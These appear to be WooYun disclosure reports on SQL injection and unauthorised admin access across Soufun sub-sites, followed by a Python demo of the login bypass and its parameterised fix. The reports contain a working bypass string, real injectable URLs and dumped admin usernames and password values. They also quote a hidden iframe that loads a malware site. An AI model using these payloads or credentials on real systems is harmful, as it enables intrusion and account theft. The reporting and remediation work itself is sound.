Brief description: the backend management of a Soufun sub-station can be accessed by bypassing verification.
http://dg.soufun.com/market/zhongjie/admin/
1. SQL injection in the login form. A crafted query fragment bypasses verification, for example `'or ''='' or ''='`.
2. Unauthorized access:
http://dg.soufun.com/market/zhongjie/admin/news.asp
http://dg.soufun.com/market/zhongjie/admin/com.asp
3. SQL injection on a public page, from which the administrator account and password can be obtained.
http://dg.soufun.com/market/zhongjie/showcom.asp?id=23
Proof of vulnerability: `'or'='` logs in directly.
Unauthorized access:
http://dg.soufun.com/market/zhongjie/admin/news.asp
http://dg.soufun.com/market/zhongjie/admin/com.asp
SQL injection: http://dg.soufun.com/market/zhongjie/showcom.asp?id=23
Solution: filter parameters and add verification for unauthorized access pages
This backend appears to be deprecated and can be removed.
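To show why the login form in section 1 accepts `'or ''='' or ''='` and what "filter parameters" means in practice, here is an added example (not code from the report or from Soufun): a constructed in-memory `admin` table with assumed columns, the string-concatenated query pattern behind the bypass, and the parameterised, hashed replacement.

```python
import hashlib
import sqlite3

# Constructed stand-in for the sub-station's "admin" table. The column names
# are assumed (the report only shows id / user / pass); the stored value is a
# SHA-256 digest rather than the plaintext the report found in the real tables.
def make_admin_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES (?, ?, ?)",
               (1, "admin", hashlib.sha256(b"correct-horse").hexdigest()))
    return db

def hash_pw(pwd):
    # Demonstration only: a real deployment should use a salted, slow KDF.
    return hashlib.sha256(pwd.encode()).hexdigest()

# The pattern behind the bypass: the username field is concatenated straight
# into the WHERE clause, so quotes in the input rewrite the query into
#   username='' or ''='' or ''='' AND password='<digest>'
# which is true for every row.
def login_vulnerable(db, user, pwd):
    sql = ("SELECT COUNT(*) FROM admin WHERE username='" + user +
           "' AND password='" + hash_pw(pwd) + "'")
    return db.execute(sql).fetchone()[0] > 0

# Fixed form: bound parameters keep the input as data, so the same string is
# compared literally against the username column and matches nothing.
def login_fixed(db, user, pwd):
    sql = "SELECT COUNT(*) FROM admin WHERE username=? AND password=?"
    return db.execute(sql, (user, hash_pw(pwd))).fetchone()[0] > 0

# The exact value from the report, submitted in both form fields.
BYPASS = "'or ''='' or ''='"

def demo():
    db = make_admin_db()
    return {
        "vulnerable_bypassed": login_vulnerable(db, BYPASS, BYPASS),
        "fixed_bypassed": login_fixed(db, BYPASS, BYPASS),
        "fixed_real_login": login_fixed(db, "admin", "correct-horse"),
    }

if __name__ == "__main__":
    print(demo())
```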
Brief description: SQL Injection exists on multiple pages of Soufun.
Description: SQL injection exists on multiple pages; exposed database content + multiple SQL injections + backend access after injection: rank 20.
Multiple sub-stations, multiple pages, and improper filtering of multiple parameters lead to multiple SQL injections, and the management passwords in multiple databases are not encrypted.
If a single SQL injection is worth at least rank 3, I think rank 50 is easy to justify here.
More than 50% of the ASP programs on the main site and sub-stations contain SQL query statements; there are fewer ASPX and PHP programs.
Some pages have already been injected with malicious content.
A conservative estimate is that the probability the site has already been intruded is about 80%. We recommend a full inspection of the website, including sub-stations, to delete unwanted junk pages and programs.
 
Proof of vulnerability: http://cq.soufun.com/cqfjh/manage/findkfs.asp?realid=59
http://cq.soufun.com/cqfjh/manage/findoneloupan.asp?houseid=65
http://dg.soufun.com/market/zhongjie/showcom.asp?id=23
http://suzhou.soufun.com/market/lijingyuan/zxdt_xianshi.asp?id=10
http://shdesign.soufun.com/mj/shenggao/showitem.asp?id=11
http://shdesign.soufun.com/hy/08/jindi01/shownews.asp?id=90
http://esf.sz.soufun.com/asp/zhaoping/oneseeker.asp?id=42364
http://nb.soufun.com/ad/zzk/zpxx/zp_more.asp?ypid=1,212
http://changchun.soufun.com/market/article/list.asp?articleid=65
http://cs.soufun.com/market/eles/news_view.asp?newsid=92
Table: admin
id | pass    | user
1  | 8370396 | changsha_newhouse
http://bj.soufun.com/market/yueguizhuangyuan/news/view.asp?id=5
Table: admin
id | password         | username
9  | 27c8f0e73f4d7f48 | admin
11 | b3506677e4c55e91 | zhang
...
Too many to list.
Solution: perform a major check on the website to delete unwanted junk pages and programs.
Filter parameters
Multiple pages under the sub-station http://cs.soufun.com/ have been injected with malicious content, and SQL injection exists.
For example: http://cs.soufun.com/market/eles/news_view.asp?newsid=92
The page carries a hidden iframe pointing to a site hosting malware:
 
<iframe src="http://www.gzlyqyjt.com/inc/" width='0' height='0'></iframe>
 
...
In addition, multiple pages under this substation have SQL injection, including the above link.
 
Vulnerability proof: malicious content:
SQL Injection:
Table: admin
Columns: id | pass | user
Data: 1 | 8*****6 | changsha_newhouse
Solution: delete unnecessary programs, filter parameters, and remove the malicious code.
Author: Ambulong @ WooYun